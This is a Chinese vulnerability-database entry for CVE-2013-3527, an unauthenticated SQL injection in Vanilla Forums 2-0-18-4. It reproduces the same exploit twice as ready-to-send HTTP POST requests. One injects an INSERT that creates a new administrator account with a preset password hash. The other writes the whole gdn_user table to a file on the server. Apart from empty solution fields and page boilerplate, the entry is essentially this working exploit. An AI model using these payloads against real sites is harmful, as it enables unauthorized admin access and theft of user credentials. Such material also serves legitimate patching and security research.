Vanilla Forums 2-0-18-4 - SQL-Injection Vulnerability

基本字段

漏洞编号：: SSV-78606

披露/发现时间：: 未知

提交时间：: 2014-07-01

漏洞等级：

漏洞类别：: 其他类型

影响组件：

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: CVE-2013-3527

CNNVD-ID：: CNNVD-201304-119

CNVD-ID：: CNVD-2013-02872

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 5208853 共获得 0.15KB

``` # Exploit Title: Vanilla Forums - SQL-Injection - Insert arbitrary user & dump usertable # Date: 04/05/2013 # Exploit Author: bl4ckw0rm # Vendor Homepage: http://vanillaforums.org/ # Version: 2-0-18-4 # Tested on: Windows Product Name: Vanilla Forums Vulnerable Version: Up to vanilla-core-2-0-18-4 Tested on: Windows Server 2003 Apache 2.4.3 PHP 5.4.7 MySQL 5.5.27 Vulnerability Overview: SQL-Injection is possible, because$_POST arrays are not proper sanitized. You do not need to be authenticated. Vulnerability Details: To insert an arbitrary user, a sample HTTP-Post Request looks as follows: POST /[PATH]/vanilla/entry/signin HTTP/1.1 Host: [HOST] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: [any cookie] Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 399 Form%2FTransientKey=VQYSOG2F3D38&Form%2Fhpt=&Form%2FTarget=discussions& Form%2FClientHour=2013-3-28+11%3A37&Form%2FEmail['admin';INSERT INTO gdn_user (UserID, Name, Password, HashMethod, DateInserted, Admin, Permissions) VALUES (NULL, '1234', '$P$BayO4QrMb9wgzdjNhlUBWdQcVaMnKN0', 'Vanilla', '2013-03-28 00:00:00', '1', '');#]=abcd&Form%2FPassword=*&Form%2FSign_In= Sign+In&Checkboxes%5B%5D=RememberMe Indeed you has to take care of the proper encryption algorithm which is currently used. As it is not possible to get the user table displayed on the website, you could establish an attack as follows: POST /[PATH]/vanilla/entry/passwordrequest HTTP/1.1 Host: [HOST] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 255 Form%2FTransientKey=OJS6EB1J0KW7&Form%2Fhpt=&Form%2FEmail['ac';select * from gdn_user into outfile '[FULL_PATH]\\vanilla\\out.txt' #]=13& Form%2FRequest_a_new_password=Request+a+new+password ```

共 4 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.7KB

# Exploit Title: Vanilla Forums - SQL-Injection - Insert arbitrary user & dump usertable # Date: 04/05/2013 # Exploit Author: bl4ckw0rm # Vendor Homepage: http://vanillaforums.org/ # Version: 2-0-18-4 # Tested on: Windows Product Name: Vanilla Forums Vulnerable Version: Up to vanilla-core-2-0-18-4 Tested on: Windows Server 2003 Apache 2.4.3 PHP 5.4.7 MySQL 5.5.27 Vulnerability Overview: SQL-Injection is possible, because$_POST arrays are not proper sanitized. You do not need to be authenticated. Vulnerability Details: To insert an arbitrary user, a sample HTTP-Post Request looks as follows: POST /[PATH]/vanilla/entry/signin HTTP/1.1 Host: [HOST] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: [any cookie] Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 399 Form%2FTransientKey=VQYSOG2F3D38&Form%2Fhpt=&Form%2FTarget=discussions& Form%2FClientHour=2013-3-28+11%3A37&Form%2FEmail['admin';INSERT INTO gdn_user (UserID, Name, Password, HashMethod, DateInserted, Admin, Permissions) VALUES (NULL, '1234', '$P$BayO4QrMb9wgzdjNhlUBWdQcVaMnKN0', 'Vanilla', '2013-03-28 00:00:00', '1', '');#]=abcd&Form%2FPassword=*&Form%2FSign_In= Sign+In&Checkboxes%5B%5D=RememberMe Indeed you has to take care of the proper encryption algorithm which is currently used. As it is not possible to get the user table displayed on the website, you could establish an attack as follows: POST /[PATH]/vanilla/entry/passwordrequest HTTP/1.1 Host: [HOST] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 255 Form%2FTransientKey=OJS6EB1J0KW7&Form%2Fhpt=&Form%2FEmail['ac';select * from gdn_user into outfile '[FULL_PATH]\\vanilla\\out.txt' #]=13& Form%2FRequest_a_new_password=Request+a+new+password

共 5 兑换

参考链接

http://www.exploit-db.com/exploits/24927

解决方案

临时解决方案

官方解决方案

防护方案

匿名兑换漏洞详情
匿名兑换PoC
匿名兑换漏洞详情
匿名兑换PoC
匿名兑换PoC
匿名兑换PoC
匿名兑换漏洞详情
匿名兑换PoC
匿名兑换漏洞详情

生命线

发现/披露了漏洞
2014-07-01 提交了漏洞
2014-07-01 提交补充了漏洞详情
2014-07-01 提交更新了 PoC

Vanilla Forums 2-0-18-4 - SQL-Injection Vulnerability

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

Vanilla Forums 2-0-18-4 - SQL-Injection Vulnerability

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定